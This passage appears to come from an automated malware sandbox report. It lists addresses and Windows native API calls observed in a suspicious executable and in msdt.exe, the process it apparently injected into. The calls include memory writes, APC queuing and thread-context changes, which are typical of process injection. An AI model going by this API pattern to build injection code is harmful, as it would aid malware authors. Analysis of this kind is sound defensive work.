          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F341205_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1F9005_2_00F1F900
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4EBB05_2_00F4EBB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2841F5_2_00F2841F
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E05_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE1D555_2_00FE1D55
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F10D205_2_00F10D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A015_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB09015_2_04ADB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD841F15_2_04AD841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B8100215_2_04B81002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF258115_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E015_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC0D2015_2_04AC0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE412015_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACF90015_2_04ACF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91D5515_2_04B91D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE6E3015_2_04AE6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFEBB015_2_04AFEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277C34315_2_0277C343
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B8D615_2_0277B8D6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B8D315_2_0277B8D3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277C98B15_2_0277C98B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762FB015_2_02762FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02768C9015_2_02768C90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02768C8B15_2_02768C8B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762D9015_2_02762D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762D8C15_2_02762D8C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04ACB150 appears 35 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: String function: 00F1B150 appears 31 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004185EB NtCreateFile,5_2_004185EB
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00F598F0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00F59860
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk,5_2_00F59840
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk,5_2_00F599A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00F59910
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk,5_2_00F59A50
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,5_2_00F59A20
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00F59A00
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F595D0 NtClose,LdrInitializeThunk,5_2_00F595D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59540 NtReadFile,LdrInitializeThunk,5_2_00F59540
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00F596E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00F59660
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59FE0 NtCreateMutant,LdrInitializeThunk,5_2_00F59FE0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00F597A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,5_2_00F59780
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,5_2_00F59710
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F598A0 NtWriteVirtualMemory,5_2_00F598A0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5B040 NtSuspendThread,5_2_00F5B040
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59820 NtEnumerateKey,5_2_00F59820
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F599D0 NtCreateProcessEx,5_2_00F599D0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59950 NtQueueApcThread,5_2_00F59950
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A80 NtOpenDirectoryObject,5_2_00F59A80
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A10 NtQuerySection,5_2_00F59A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5A3B0 NtGetContextThread,5_2_00F5A3B0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59B00 NtSetValueKey,5_2_00F59B00
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F595F0 NtQueryInformationFile,5_2_00F595F0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59560 NtWriteFile,5_2_00F59560
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5AD30 NtSetContextThread,5_2_00F5AD30
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59520 NtWaitForSingleObject,5_2_00F59520
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F596D0 NtCreateKey,5_2_00F596D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,15_2_04B09860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09840 NtDelayExecution,LdrInitializeThunk,15_2_04B09840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099A0 NtCreateSection,LdrInitializeThunk,15_2_04B099A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095D0 NtClose,LdrInitializeThunk,15_2_04B095D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_04B09910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09540 NtReadFile,LdrInitializeThunk,15_2_04B09540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04B096E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B096D0 NtCreateKey,LdrInitializeThunk,15_2_04B096D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04B09660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09650 NtQueryValueKey,LdrInitializeThunk,15_2_04B09650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A50 NtCreateFile,LdrInitializeThunk,15_2_04B09A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,15_2_04B09780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,15_2_04B09FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,15_2_04B09710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098A0 NtWriteVirtualMemory,15_2_04B098A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098F0 NtReadVirtualMemory,15_2_04B098F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09820 NtEnumerateKey,15_2_04B09820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0B040 NtSuspendThread,15_2_04B0B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095F0 NtQueryInformationFile,15_2_04B095F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099D0 NtCreateProcessEx,15_2_04B099D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0AD30 NtSetContextThread,15_2_04B0AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09520 NtWaitForSingleObject,15_2_04B09520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09560 NtWriteFile,15_2_04B09560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09950 NtQueueApcThread,15_2_04B09950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A80 NtOpenDirectoryObject,15_2_04B09A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A20 NtResumeThread,15_2_04B09A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09610 NtEnumerateValueKey,15_2_04B09610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A10 NtQuerySection,15_2_04B09A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A00 NtProtectVirtualMemory,15_2_04B09A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09670 NtQueryInformationProcess,15_2_04B09670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A3B0 NtGetContextThread,15_2_04B0A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B097A0 NtUnmapViewOfSection,15_2_04B097A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09730 NtQueryVirtualMemory,15_2_04B09730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A710 NtOpenProcessToken,15_2_04B0A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09B00 NtSetValueKey,15_2_04B09B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09770 NtSetInformationFile,15_2_04B09770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A770 NtOpenThread,15_2_04B0A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09760 NtOpenProcess,15_2_04B09760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027786A0 NtReadFile,15_2_027786A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02778720 NtClose,15_2_02778720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787D0 NtAllocateVirtualMemory,15_2_027787D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785F0 NtCreateFile,15_2_027785F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277871A NtClose,15_2_0277871A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787CA NtAllocateVirtualMemory,15_2_027787CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785EB NtCreateFile,15_2_027785EB